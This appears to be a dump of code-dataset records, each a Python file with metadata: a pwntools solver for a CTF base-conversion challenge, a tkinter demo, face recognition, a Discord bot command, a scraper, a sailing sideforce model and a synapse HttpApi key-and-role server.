\"\\n\")\n\nfiles.close()\n\n","sub_path":"regression/kdd/test_ntuple.py","file_name":"test_ntuple.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356001599","text":"from pwn import *\nimport base64\nimport binascii\n\n\nr = remote(\"challenge.acictf.com\", 19816)\n\ndef convert(s, e, stuff):\n\traw = \"\"\n\tif s == \"raw\":\n\t\traw = stuff\n\telif s == \"b64\":\n\t\traw = base64.b64decode(stuff)\n\telif s == \"hex\":\n\t\traw = binascii.unhexlify(stuff)\n\telif s == \"dec\":\n\t\traw = binascii.unhexlify(hex(int(stuff, 10)).rstrip(\"L\").lstrip(\"0x\"))\n\telif s == \"oct\":\n\t\traw = binascii.unhexlify(hex(int(stuff, 8)).rstrip(\"L\").lstrip(\"0x\"))\n\telif s == \"bin\":\n\t\traw = binascii.unhexlify(hex(int(stuff, 2)).rstrip(\"L\").lstrip(\"0x\"))\n\telse:\n\t\tprint(\"start method not found\")\n\n\tres = \"\"\n\tif e == \"raw\":\n\t\tres = raw.encode(\"utf-8\")\n\telif e == \"b64\":\n\t\tres = base64.b64encode(raw)\n\telif e == \"hex\":\n\t\tres = binascii.hexlify(raw).rstrip(\"L\")\n\telif e == \"dec\":\n\t\tres = str(int(binascii.hexlify(raw), 16))\n\telif e == \"oct\":\n\t\tres = str(oct(int(binascii.hexlify(raw), 16))).lstrip(\"0\").rstrip(\"L\")\n\telif e == \"bin\":\n\t\tres = bin(int(binascii.hexlify(raw), 16)).lstrip(\"0b\")\n\telse:\n\t\tprint(\"end method not found\")\n\n\treturn 
res\n\nfor i in range(5):\n\tr.recvuntil(\"--\")\n\tr.recvline()\n\tconversion = r.recvline().rstrip().split(\" -> \")\n\tstart = conversion[0]\n\tend = conversion[1]\n\tstuff = r.recvline().rstrip()\n\tresp = convert(start, end, stuff)\n\n\tprint(\"{} Converting {} to {}\\nOriginal: {}\\nConverted: {}\\n\".format(i, start, end, stuff, resp))\n\tr.recvuntil(\"answer: \")\n\tr.sendline(resp)\n\nr.interactive()\n","sub_path":"Miscellaneous/bases.py","file_name":"bases.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78471664","text":"from tkinter import *\r\nfrom random import choice\r\n\r\nApp = Tk()\r\nApp.title(\"CheckBox\")\r\nApp.geometry('350x250')\r\n\r\ncheck = StringVar()#Store integer values\r\n#create checkbox\r\nchk = Checkbutton(App, text='Checkbox', variable=check, onvalue='yes', offvalue='Nope')\r\nchk.deselect()\r\nchk.pack()\r\n\r\ndef show():\r\n msg=Label(App, text=check.get())\r\n msg.pack()\r\n\r\nB = Button(App, text='show', command=show )\r\nB.pack()\r\nApp.mainloop()#execution","sub_path":"CheckBox.py","file_name":"CheckBox.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"32852207","text":"from dataclasses import dataclass\nfrom typing import Dict\n\n\n@dataclass\nclass PostPayload:\n sub: str = None # Must be provided\n title: str = None # Must be provided\n text: str = \"\" # Needs to be empty if it is a title only post, but None if it is a link post\n link: str = None\n image: str = None\n video: str = None\n parent: str = None\n flair_id: str = None\n flair_text: str = None\n collection_id: str = None\n sort: str = None\n comment_text: str = None\n date: str = \"7,23\"\n spoiler: bool = False\n nsfw: bool = False\n lock: bool = False\n contest: bool = False\n dont_notify: bool = False\n distinguish: bool = False\n sticky: bool = False\n lock_comment: bool = False\n distinguish_comment: bool = False\n sticky_comment: bool = False\n wait: bool = True\n\n _overrides_dict: Dict = None\n\n def get_overrides_dict(self) -> Dict:\n return self._overrides_dict\n\n @staticmethod\n def from_overrides(overrides_dict: Dict):\n # Use python black magic to convert the dictionary to our data class (overwriting only the provided fields)\n # for easy and consistent use\n payload = PostPayload(**overrides_dict)\n payload._overrides_dict = overrides_dict\n return payload\n","sub_path":"postpayload.py","file_name":"postpayload.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"196379158","text":"import face_recognition\nimport face_preload\nimport numpy as np\nimport cv2\nimport os\n\nface_dir = os.path.abspath('./known')\nface_list = os.listdir(face_dir)\n\n# Load known face\ndef loadFace(k_encodings, k_names, add_new=False):\n\n\tfor face_image in face_list:\n\t\timg = face_recognition.load_image_file(os.path.join(face_dir, face_image))\n\t\tk_encodings.append(face_recognition.face_encodings(img)[0])\n\t\tk_names.append(face_image[:-4])\n\n\treturn k_encodings, k_names\n\ncamera_cap = cv2.VideoCapture(0)\n\n\n# Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\n\n# known_face_encodings = []\n# known_face_names = []\n# known_face_encodings, known_face_names = loadFace(known_face_encodings, 
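# Aside on the bases.py record above, a Python 3 suggestion rather than part of the original: hex() can emit odd-length strings that binascii.unhexlify rejects, while int.to_bytes sidesteps that edge case.\nn = int('4142', 16)\nraw = n.to_bytes((n.bit_length() + 7) // 8, 'big')  # b'AB'\n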
known_face_names)\nknown_face_encodings, known_face_names = face_preload.loadPreload('preload_data_2.json')\n\nwhile True:\n\tret, frame = camera_cap.read()\n\tkey_stroke = cv2.waitKey(1) & 0xff\n\n\tif key_stroke == ord('q'):\n\t\tbreak\n\n\t# Add new face and reload\n\telif key_stroke == ord('c'):\n\t\tf_name = input('Your name: ') + '.jpg'\n\t\tf_name = os.path.join(face_dir, f_name)\n\t\tcv2.imwrite(f_name, frame)\n\n\t\tknown_face_encodings, known_face_names = face_preload.loadFaces(f_name)\n\n\t\tprint('[+] New face added and loaded')\n\n\t# Resize frame of video to 1/4 size for faster face recognition processing\n\tsmall_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n\t# Convert BGR (opencv) to RGB (face_recognition)\n\trgb_small_frame = small_frame[:, :, ::-1]\n\n\t# Only process every other frame of video to save time\n\tif process_this_frame:\n\t\t# Find all the faces and the face encodings in the current frame of video\n\t\tface_locations = face_recognition.face_locations(rgb_small_frame)\n\t\tface_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n\t\tface_names = []\n\t\tfor face_encoding in face_encodings:\n\t\t\t# See if the face is a match for the known face(s)\n\t\t\tmatches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n\t\t\tname = \"Unknown\"\n\n\t\t\t# If a match was found in known_face_encodings, just use the first one.\n\t\t\tif True in matches:\n\t\t\t\tfirst_match_index = matches.index(True)\n\t\t\t\tname = known_face_names[first_match_index]\n\n\t\t\t# # Or instead, use the known face with the smallest distance to the new face\n\t\t\t# face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n\t\t\t# best_match_index = np.argmin(face_distances)\n\t\t\t# if matches[best_match_index]:\n\t\t\t# \tname = known_face_names[best_match_index]\n\n\t\t\tface_names.append(name)\n\n\tprocess_this_frame = not process_this_frame\n\n\t# Display the results\n\tfor (top, right, bottom, left), name in zip(face_locations, face_names):\n\t\t# Scale back up face locations since the frame we detected in was scaled to 1/4 size\n\t\ttop *= 4\n\t\tright *= 4\n\t\tbottom *= 4\n\t\tleft *= 4\n\n\t\t# Draw a box around the face\n\t\tcv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n\t\t# Draw a label with a name below the face\n\t\tcv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n\t\tfont = cv2.FONT_HERSHEY_DUPLEX\n\t\tcv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\n\tcv2.imshow('frame', frame)\n\n\ncamera_cap.release()\ncv2.destroyAllWindows()","sub_path":"face_cpc.py","file_name":"face_cpc.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21077776","text":"__all__ = ()\n\nfrom hata.ext.slash import Button, abort\n\nfrom ....bots import SLASH_CLIENT\n\nfrom ...touhou_core import (\n TOUHOU_CHARACTERS_UNIQUE, TouhouHandlerKey, get_touhou_character_like, get_touhou_character_names_like\n)\nfrom ...touhou_core.characters import (\n CHIRUNO, FUJIWARA_NO_MOKOU, HAKUREI_REIMU, HATA_NO_KOKORO, HINANAWI_TENSHI, HONG_MEILING, IZAYOI_SAKUYA,\n KAZAMI_YUUKA, KIRISAME_MARISA, KOCHIYA_SANAE, KOMEIJI_KOISHI, KOMEIJI_SATORI, MARGATROID_ALICE, MORIYA_SUWAKO,\n PATCHOULI_KNOWLEDGE, REISEN_UDONGEIN_INABA, RUMIA, SAIGYOUJI_YUYUKO, SCARLET_FLANDRE, SCARLET_REMILIA,\n SHAMEIMARU_AYA, SHIKI_EIKI_YAMAXANADU, TATARA_KOGASA, 
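# Hedged sketch of the distance-based matching that face_cpc.py above keeps commented out: pick the smallest encoding distance and gate it on the library's default 0.6 tolerance.\nimport numpy as np\nimport face_recognition\n\nface_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\nbest = int(np.argmin(face_distances))\nname = known_face_names[best] if face_distances[best] < 0.6 else 'Unknown'\n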
TOYOSATOMIMI_NO_MIKO, YAKUMO_YUKARI\n)\n\nfrom ..constants import EMOJI_NEW\n\nfrom .touhou_character import (\n NewTouhouCharacter, build_no_match_embed, build_touhou_character_embed, make_custom_id_of_character\n)\n\n\n\n@SLASH_CLIENT.interactions(is_global = True)\nasync def touhou_character(\n client,\n event,\n name: ('str', 'Who\\'s?'),\n):\n \"\"\"Shows you the given Touhou character's portrait.\"\"\"\n name_length = len(name)\n if name_length == 0:\n abort('Empty name was given.')\n \n touhou_character = get_touhou_character_like(name)\n if (touhou_character is None):\n return build_no_match_embed(name)\n \n handler = TouhouHandlerKey(touhou_character, solo = True).get_handler()\n image_detail = await handler.get_image(client, event)\n \n embed = build_touhou_character_embed(touhou_character, image_detail)\n \n if image_detail is None:\n components = None\n else:\n components = Button(\n emoji = EMOJI_NEW,\n custom_id = make_custom_id_of_character(touhou_character),\n )\n \n if event.is_unanswered():\n function = type(client).interaction_response_message_create\n else:\n function = type(client).interaction_response_message_edit\n \n await function(\n client,\n event,\n embed = embed,\n components = components,\n )\n\n\nPOPULAR_TOUHOU_CHARACTER_NAMES = [\n KOMEIJI_KOISHI.name,\n KIRISAME_MARISA.name,\n HAKUREI_REIMU.name,\n SCARLET_FLANDRE.name,\n IZAYOI_SAKUYA.name,\n SCARLET_REMILIA.name,\n FUJIWARA_NO_MOKOU.name,\n KOMEIJI_SATORI.name,\n SAIGYOUJI_YUYUKO.name,\n SHAMEIMARU_AYA.name,\n MARGATROID_ALICE.name,\n KOCHIYA_SANAE.name,\n REISEN_UDONGEIN_INABA.name,\n HINANAWI_TENSHI.name,\n YAKUMO_YUKARI.name,\n HATA_NO_KOKORO.name,\n CHIRUNO.name,\n PATCHOULI_KNOWLEDGE.name,\n TATARA_KOGASA.name,\n RUMIA.name,\n MORIYA_SUWAKO.name,\n SHIKI_EIKI_YAMAXANADU.name,\n KAZAMI_YUUKA.name,\n HONG_MEILING.name,\n TOYOSATOMIMI_NO_MIKO.name,\n]\n\n\n@touhou_character.autocomplete('name')\nasync def auto_complete_touhou_character_name(name):\n if name is None:\n touhou_character_names = POPULAR_TOUHOU_CHARACTER_NAMES\n else:\n touhou_character_names = get_touhou_character_names_like(name)\n \n return touhou_character_names\n\n\n\nfor touhou_character in TOUHOU_CHARACTERS_UNIQUE:\n SLASH_CLIENT.interactions(\n NewTouhouCharacter(TouhouHandlerKey(touhou_character, solo = True).get_handler(), touhou_character),\n custom_id = make_custom_id_of_character(touhou_character),\n )\n\ntouhou_character = None\n\ndel touhou_character\n","sub_path":"koishi/plugins/image_handling_commands/touhou_character/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12123219","text":"#-*- coding: cp949 -*- \n#ddanzi newslist parse\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request,urlopen\nfrom urllib.parse import urljoin\n\nbase_url = \"http://www.ddanzi.com/ddanziNews\"\n\nurl_request = Request(base_url,headers={'User-Agent': 'Mozilla/5.0'})\n\nboard = urlopen(url_request).read()\n\nbs4_ddanzi = BeautifulSoup(board,\"html.parser\")\n#find_for = bs4_ddanzi.find_all(\"tr\",attrs={'class':\"notice\"})\nfind_else = bs4_ddanzi.find_all(\"td\",attrs={'class':'title'})\n\nfor r in find_else:\n print(r.find('a').get_text(strip=True))\n \n\n","sub_path":"yb_ddanzi.py","file_name":"yb_ddanzi.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119094376","text":"#!/usr/bin/python\n# -*- 
coding: utf-8 -*-\n\nfrom math import cos, sin, radians, pi\n\nfrom fscore.forces import Force\n\n\ndef sideforce_by_element_fossati(boatspeed, heel_angle, leeway_angle, rudder_angle, coe, projected_area, span,\n                                 aspect_ratio_multiplier=2., use_cos_heel_angle=True, rudder_angle_influence=0.,\n                                 speed_multiplier=1.0, rho_water=1025.):\n    \"\"\"Lift (i.e. sideforce) and drag due to lift [N] of an underwater element, mostly due to leeway.\n    Viscous effects (friction and pressure drag) are not accounted for.\n\n    Parameters\n    ----------\n    boatspeed : float\n        boat speed [m/s]\n    heel_angle : float\n        The heel angle [degrees], between -90 and 90.\n    leeway_angle : float\n        The leeway angle [degrees].\n    rudder_angle : float\n        The rudder angle [degrees].\n    coe : list of 3 floats\n        Represents the x, y, z coordinates of the centre of effort.\n        The centre of effort can be estimated by projecting the projected surface barycentre to the 1/4 chord line.\n    projected_area : float\n        Projected area [m**2] of the underwater element, must be > 0\n    span : float\n        Span [m] of the underwater element, must be > 0.\n    aspect_ratio_multiplier : float, optional (default 2.)\n        Must be between 0.5 and 2.5\n        Modifier of the geometric aspect ratio calculated from projected area and span to get effective aspect ratio\n        Use 2. for a lifting plane with a plate effect at one end.\n    use_cos_heel_angle : boolean, optional (default True).\n        If True, multiply the angle of attack by the cosine of the heel angle.\n        If False, use the raw angle of attack.\n        Use False for the hull / canoebody; use True for keel and rudder.\n    rudder_angle_influence : float, optional (default 0.)\n        Must be between 0 and 1.\n        Fraction of the rudder angle to add to the angle of attack.\n        Normally, use 1. for a rudder, 0. otherwise.\n    speed_multiplier : float, optional (default 1.0)\n        Must be between 0.6 and 1.4.\n        Multiplier of the free flow speed.\n        A current practice is, for example, to use a 0.9 speed multiplier for the rudder.\n    rho_water : float, optional (default 1025.)\n        Water density [kg/m**3], must be between 950 and 1050\n\n    References\n    ----------\n    http://books.google.fr/books?id=-cFbdmv4ScoC&pg=PA143&lpg=PA143&dq=hull+keel+leeway+coefficient&source=bl&ots=FR3-j2SEsk&sig=sf5wY8UcdousMeUIpsmOBrHtUgw&hl=fr&sa=X&ei=Ch96UoD9OMyQ0QXFtIDoDA&ved=0CGsQ6AEwBw#v=onepage&q=hull%20keel%20leeway%20coefficient&f=false\n\n    Returns\n    -------\n    a Force object, representing the sideforce and induced drag [N] on the hull.\n\n    \"\"\"\n    assert projected_area > 0.\n    assert span > 0.\n    assert 0.5 <= aspect_ratio_multiplier <= 2.5\n    assert 0 <= rudder_angle_influence <= 1.\n    assert 0.6 <= speed_multiplier <= 1.4\n    assert 950 < rho_water < 1050\n\n    geometric_aspect_ratio = span**2 / projected_area\n    effective_aspect_ratio = geometric_aspect_ratio * aspect_ratio_multiplier\n\n    cl_alpha_3d = 0.105 / (1. + (1.92 / effective_aspect_ratio))\n\n    boatspeed_sign = boatspeed / abs(boatspeed) if boatspeed != 0. 
else 0.\n    if use_cos_heel_angle:\n        Cl = cl_alpha_3d * (leeway_angle + rudder_angle_influence * rudder_angle) * cos(radians(heel_angle))\n    else:\n        Cl = cl_alpha_3d * (leeway_angle + rudder_angle_influence * rudder_angle)\n\n    lift = Cl * 0.5 * rho_water * projected_area * (boatspeed * speed_multiplier)**2\n\n    # induced drag coefficient\n    oswald_efficiency_factor = 0.9\n    Cdi = Cl**2 / (pi * effective_aspect_ratio * oswald_efficiency_factor)\n\n    induced_drag = 0.5 * Cdi * rho_water * projected_area * (boatspeed * speed_multiplier)**2\n\n    return Force([-induced_drag * boatspeed_sign,\n                  -lift * cos(radians(heel_angle)) * boatspeed_sign,\n                  lift * sin(radians(heel_angle)) * boatspeed_sign],\n                 [coe[0],\n                  coe[1] + coe[2] * sin(radians(heel_angle)),\n                  coe[2] * cos(radians(heel_angle))])\n","sub_path":"fshydro/sideforce/fossati.py","file_name":"fossati.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"95981185","text":"import json\nimport time\nimport base64\nimport fnmatch\nimport requests\nimport threading\nimport collections\n\nimport synapse.dyndeps as s_dyndeps\nimport synapse.eventbus as s_eventbus\nimport synapse.mindmeld as s_mindmeld\n\nfrom synapse.common import *\n\ndef initkey(**info):\n    info.setdefault('en',True)\n    info.setdefault('name',None)\n    info.setdefault('roles',[])\n    info.setdefault('allows',[])\n    return info\n\ndef initrole(**info):\n    info.setdefault('en',True)\n    info.setdefault('allows',[])\n    return info\n\ndef initconf():\n    return {\n        'port':8080,\n        'host':'0.0.0.0',\n        'pool':16,\n\n        'sslkey':None,\n        'sslcert':None,\n\n        'melddir':None, # where do we store mindmeld packages?\n\n        'roles':{\n            # <rolename>:{\n            #     'en':True,\n            #     'allows':[\n            #         ('/context/v1/*',{'rate':(10,60), }),\n            #     ],\n            # }\n            'root':{\n                'en':True,\n                'allows':{\n                    '*':{},\n                }\n            },\n        },\n\n        'apikeys':{\n            # <apikey>:{\n            #     'en':True,\n            #     'name':'woot',\n            #     'roles':[],\n            #     'allows':[\n            #         ('/context/v1/*',{'rate':(10,60), }),\n            #     ],\n            # }\n            guidstr():{\n                'en':True,\n                'name':'root',\n                'roles':[],\n                'allows':[\n                    ('*',{}),\n                ],\n            },\n\n            #None:{\n                #'en':False,\n                #'allows':[],\n            #},\n        },\n\n        'objects':{\n            # <name>:('<ctor>',args,kwargs),\n        },\n\n        'apipaths':{\n            # <path>:{'obj':<objname>,'meth':<methname>},\n        },\n\n        'filepaths':{\n            # <path>:{'filepath':<filepath>},\n        },\n\n    }\n\nclass DupRole(Exception):pass\nclass DupApiKey(Exception):pass\nclass NoSuchApiObj(Exception):pass\nclass NoSuchApiKey(Exception):pass\nclass NoSuchApiPath(Exception):pass\nclass NoSuchCtor(Exception):pass\nclass NoSuchRole(Exception):pass\nclass NoSuchApiMeth(Exception):pass\n\ndef httppath(path):\n    '''\n    Decorator which marks an object method as the handler for an HTTP API path.\n    '''\n    def wraphttp(f):\n        f._http_apipath = path\n        return f\n    return wraphttp\n\nclass HttpApi(s_eventbus.EventBus):\n\n    def __init__(self, jsinfo=None, jsfile=None):\n        if jsinfo == None:\n            jsinfo = initconf()\n\n        s_eventbus.EventBus.__init__(self)\n\n        self.jsfile = jsfile\n        self.jsinfo = jsinfo\n        self.jslock = threading.Lock()\n\n        self.objs = {}\n        self.melds = []\n        self.pathmeths = {}\n        self.rulecache = {} # (apikey,path):<ruleinfo>\n\n        self.jsinfo.setdefault('objects',{})\n        self.jsinfo.setdefault('apikeys',{})\n        self.jsinfo.setdefault('apipaths',{})\n        self.jsinfo.setdefault('filepaths',{})\n\n        melddir = self.jsinfo.get('melddir')\n        if melddir != None:\n            if not os.path.isdir(melddir):\n                raise Exception('Invalid melddir: %s' % (melddir,))\n\n            for filename in os.listdir(melddir):\n                meldpath = os.path.join(melddir,filename)\n                if not os.path.isfile(meldpath):\n                    continue\n\n                with open(meldpath,'rb') as fd:\n                    b64 = fd.read().decode('utf8')\n                    self._loadMeldBase64(b64)\n\n        for name,(ctor,args,kwargs) in 
self.jsinfo['objects'].items():\n self._loadApiObject(name,ctor,*args,**kwargs)\n\n for path,info in self.jsinfo['apipaths'].items():\n objname = info.get('obj')\n methname = info.get('meth')\n self._loadApiPath(path,objname,methname)\n\n self.loadHttpPaths(self)\n\n def runHttpGet(self, path, headers, body):\n '''\n Run an HTTP GET request through the HttpApi.\n Returns a tuple of (code,headers,retinfo) for the response.\n\n Example:\n\n code,headers,retinfo = api.runHttpGet(path, hdrs, body)\n\n '''\n return self.runHttpPost(path, headers, body)\n\n def runHttpPost(self, path, headers, body):\n '''\n Run an HTTP POST request through the HttpApi.\n Returns a tuple of (code,headers,retinfo) for the response.\n\n Example:\n\n code,headers,retinfo = api.runHttpPost(path, hdrs, body)\n\n Notes:\n\n POST /path/to/api HTTP/1.1\n content-length: 43\n content-type: application/json\n apikey: asdfasdfasdfasdf\n\n {\"args\":[arg0,arg1],\"kwargs\":{\"foo\":\"bar\"}}\n\n '''\n apikey = headers.get('apikey')\n try:\n jsreq = json.loads(body.decode('utf8'))\n except Exception as e:\n return self._initErrResp(500,'BadJsonBody',msg=str(e))\n\n args = jsreq.get('args',())\n kwargs = jsreq.get('kwargs',{})\n\n return self.runHttpPath(apikey, path, *args, **kwargs)\n\n def _initErrResp(self, code, err, **retinfo):\n retinfo['err'] = err\n return (code,{},retinfo)\n\n def _initRetResp(self, code, ret, **retinfo):\n retinfo['ret'] = ret\n return (code,{},retinfo)\n\n def runHttpPath(self, apikey, path, *args, **kwargs):\n ruleinfo = self.getApiKeyAllow(apikey, path)\n if ruleinfo == None:\n return self._initErrResp(403,'PermDenied',msg='No Allow Rule')\n\n meth = self.pathmeths.get(path)\n if meth == None:\n return self._initErrResp(404, 'NoSuchApiPath', msg=path)\n\n try:\n return self._initRetResp(200, meth(*args,**kwargs) )\n except Exception as e:\n return self._initErrResp(200, e.__class__.__name__, msg=str(e))\n\n def loadHttpPaths(self, obj):\n '''\n Load any httppath decorated methods from the obj.\n\n Example:\n\n class Woot:\n\n @httppath('/foo/bar')\n def foobar(self):\n return 'hi'\n\n w = Woot()\n api = HttpApi()\n api.loadHttpPaths(w)\n\n '''\n for name in dir(obj):\n meth = getattr(obj, name, None)\n path = getattr(meth, '_http_apipath', None)\n if path == None:\n continue\n\n self.pathmeths[path] = meth\n\n def _saveJsInfo(self):\n if self.jsfile == None:\n return\n\n js = json.dumps( self.jsinfo, indent=2, sort_keys=True)\n with open( self.jsfile, 'wb') as fd:\n fd.write( js.encode('utf8') )\n\n @httppath('/./loadMeldBase64')\n def loadMeldBase64(self, b64):\n '''\n Add a base64 encoded ( for json HTTP ) binary mind meld.\n '''\n meld = self._loadMeldBase64(b64)\n melddir = self.jsinfo.get('melddir')\n if melddir == None:\n return\n\n info = meld.getMeldDict()\n name = info.get('name')\n if name == None or not name.isalnum():\n return\n\n meldpath = os.path.join(melddir,'%s.meld.b64' % name)\n with open(meldpath,'wb') as fd:\n fd.write(b64.encode('utf8'))\n\n @httppath('/./getMindMelds')\n def getMindMelds(self):\n '''\n Return a list of (name,version) tuples for MindMelds.\n '''\n return self.melds\n\n def _loadMeldBase64(self, b64):\n meld = s_mindmeld.loadMeldBase64(b64)\n\n info = meld.getMeldDict()\n\n name = info.get('name')\n vers = info.get('version')\n\n self.melds.append( {'name':name,'version':vers} )\n return meld\n\n @httppath('/./getApiKey')\n def getApiKey(self, apikey):\n '''\n Return the info tuple for an API key.\n\n Example:\n\n info = api.getApiKey(apikey)\n\n '''\n return 
self.jsinfo['apikeys'].get(apikey)\n\n    @httppath('/./getApiKeys')\n    def getApiKeys(self):\n        '''\n        Return a list of (apikey,info) tuples for the HttpApi keys.\n\n        Example:\n\n            for apikey,keyinfo in api.getApiKeys():\n                dostuff()\n\n        '''\n        return [ (k,i) for (k,i) in self.jsinfo['apikeys'].items() ]\n\n    @httppath('/./getRole')\n    def getRole(self, role):\n        '''\n        Returns a role info dict by name ( or None ).\n\n        Example:\n\n            info = api.getRole('foorole')\n\n        '''\n        return self.jsinfo['roles'].get(role)\n\n    @httppath('/./getRoles')\n    def getRoles(self):\n        '''\n        Return a list of (name,info) tuples for the HttpApi roles.\n\n        Example:\n\n            for role,info in api.getRoles():\n                dostuff()\n\n        '''\n        return [ (r,i) for (r,i) in self.jsinfo['roles'].items() ]\n\n    @httppath('/./addRole')\n    def addRole(self, role, en=True):\n        '''\n        Add a role to the HttpApi.\n\n        Example:\n\n            api.addRole('foorole')\n\n        '''\n        with self.jslock:\n            roleinfo = self.jsinfo['roles'].get(role)\n            if roleinfo != None:\n                raise DupRole(role)\n\n            self.jsinfo['roles'][role] = initrole(en=en)\n            self._saveJsInfo()\n\n    @httppath('/./delRole')\n    def delRole(self, role):\n        '''\n        Delete a role from the HttpApi.\n\n        Example:\n\n            api.delRole('foorole')\n\n        '''\n        with self.jslock:\n            roleinfo = self.jsinfo['roles'].pop(role,None)\n            if roleinfo == None:\n                raise NoSuchRole(role)\n\n            self.rulecache.clear()\n            self._saveJsInfo()\n\n    @httppath('/./addApiKey')\n    def addApiKey(self, apikey, name=None, en=True):\n        '''\n        Add a new API key.\n\n        Example:\n\n            api.addApiKey(keystr,name='woot')\n\n        '''\n        with self.jslock:\n\n            if self.jsinfo['apikeys'].get(apikey) != None:\n                raise DupApiKey()\n\n            self.jsinfo['apikeys'][apikey] = initkey(en=en,name=name)\n            self._saveJsInfo()\n\n    @httppath('/./delApiKey')\n    def delApiKey(self, apikey):\n        '''\n        Delete an API key.\n\n        Example:\n\n            api.delApiKey(apikey)\n\n        '''\n        with self.jslock:\n\n            keyinfo = self.jsinfo['apikeys'].pop(apikey,None)\n            if keyinfo == None:\n                raise NoSuchApiKey(apikey)\n\n            self._saveJsInfo()\n            self.rulecache.clear()\n\n    @httppath('/./getApiKeyAllow')\n    def getApiKeyAllow(self, apikey, path):\n        '''\n        Returns the matching allow rule info dict or None for the given API key.\n\n        Example:\n\n            info = api.getApiKeyAllow(apikey,path)\n            if info == None:\n                raise NotAllowed()\n\n            dostuff()\n\n        '''\n        cachekey = (apikey,path)\n        hit = self.rulecache.get(cachekey)\n        if hit != None:\n            return hit\n\n        keyinfo = self.jsinfo['apikeys'].get(apikey)\n        if keyinfo == None:\n            return None\n\n        if not keyinfo.get('en'):\n            return None\n\n        for rule,info in keyinfo.get('allows',()):\n            if fnmatch.fnmatch(path,rule):\n                self.rulecache[cachekey] = info\n                return info\n\n        for role in keyinfo.get('roles',()):\n            roleinfo = self.jsinfo['roles'].get(role)\n            if roleinfo == None:\n                continue\n\n            if not roleinfo.get('en'):\n                continue\n\n            for rule,info in roleinfo.get('allows',()):\n                if fnmatch.fnmatch(path,rule):\n                    self.rulecache[cachekey] = info\n                    return info\n\n    @httppath('/./addRoleAllow')\n    def addRoleAllow(self, role, rule, rate=None):\n        '''\n        Add an allow rule to a role.\n        '''\n        with self.jslock:\n            roleinfo = self._reqRole(role)\n\n            roleinfo['allows'].append( (rule,{'rate':rate}) )\n            self.rulecache.clear()\n\n            self._saveJsInfo()\n\n    def _reqApiKey(self, apikey):\n        keyinfo = self.jsinfo['apikeys'].get(apikey)\n        if keyinfo == None:\n            raise NoSuchApiKey(apikey)\n        return keyinfo\n\n    def _reqRole(self, role):\n        roleinfo = self.jsinfo['roles'].get(role)\n        if roleinfo == None:\n            raise NoSuchRole(role)\n        return roleinfo\n\n    @httppath('/./addApiKeyAllow')\n    def addApiKeyAllow(self, 
apikey, rule, rate=None):\n        '''\n        Add an allow rule to an API key.\n        '''\n        with self.jslock:\n            keyinfo = self._reqApiKey(apikey)\n\n            keyinfo['allows'].append( (rule,{'rate':rate}) )\n            self.rulecache.clear()\n            self._saveJsInfo()\n\n    @httppath('/./addApiKeyRole')\n    def addApiKeyRole(self, apikey, role):\n        '''\n        Grant a role to an api key.\n\n        Example:\n\n            api.addApiKeyRole(apikey,'foorole')\n\n        '''\n        with self.jslock:\n            keyinfo = self._reqApiKey(apikey)\n            roleinfo = self._reqRole(role)\n\n            roles = keyinfo['roles']\n            if role not in roles:\n                roles.append(role)\n\n            self.rulecache.clear()\n            self._saveJsInfo()\n\n    @httppath('/./delApiKeyRole')\n    def delApiKeyRole(self, apikey, role):\n        '''\n        Revoke a role from an api key.\n\n        Example:\n\n            api.delApiKeyRole(apikey,'foorole')\n\n        '''\n        with self.jslock:\n            keyinfo = self._reqApiKey(apikey)\n            roleinfo = self._reqRole(role)\n\n            roles = keyinfo['roles']\n            if role in roles:\n                roles.remove(role)\n\n            self.rulecache.clear()\n            self._saveJsInfo()\n\n    def _loadApiObject(self, name, ctor, *args, **kwargs):\n        meth = s_dyndeps.getDynLocal(ctor)\n        if meth == None:\n            raise NoSuchCtor(ctor)\n\n        obj = meth(*args,**kwargs)\n        self.objs[name] = obj\n\n        self.loadHttpPaths(obj)\n\n        return obj\n\n    @httppath('/./addApiObject')\n    def addApiObject(self, name, ctor, *args, **kwargs):\n        '''\n        Add an object ctor to the HttpApi.\n        '''\n        self._loadApiObject(name, ctor, *args, **kwargs)\n        with self.jslock:\n            self.jsinfo['objects'][name] = (ctor,args,kwargs)\n            self._saveJsInfo()\n\n    @httppath('/./delApiObject')\n    def delApiObject(self, name):\n        '''\n        Delete an object ctor from the HttpApi.\n        '''\n        with self.jslock:\n            self.objs.pop(name,None)\n            # FIXME how to pop its methods?\n            self.jsinfo['objects'].pop(name,None)\n            self._saveJsInfo()\n\n    @httppath('/./addApiPath')\n    def addApiPath(self, path, objname, methname):\n        '''\n        Add an API path to the HttpApi.\n\n        Example:\n            api.addApiObject('woot', 'foo.bar.baz')\n            api.addApiPath('/v1/haha', 'woot', 'haha')\n\n        '''\n        with self.jslock:\n            self._loadApiPath(path, objname, methname)\n            self.jsinfo['apipaths'][path] = {'obj':objname,'meth':methname}\n            self._saveJsInfo()\n\n    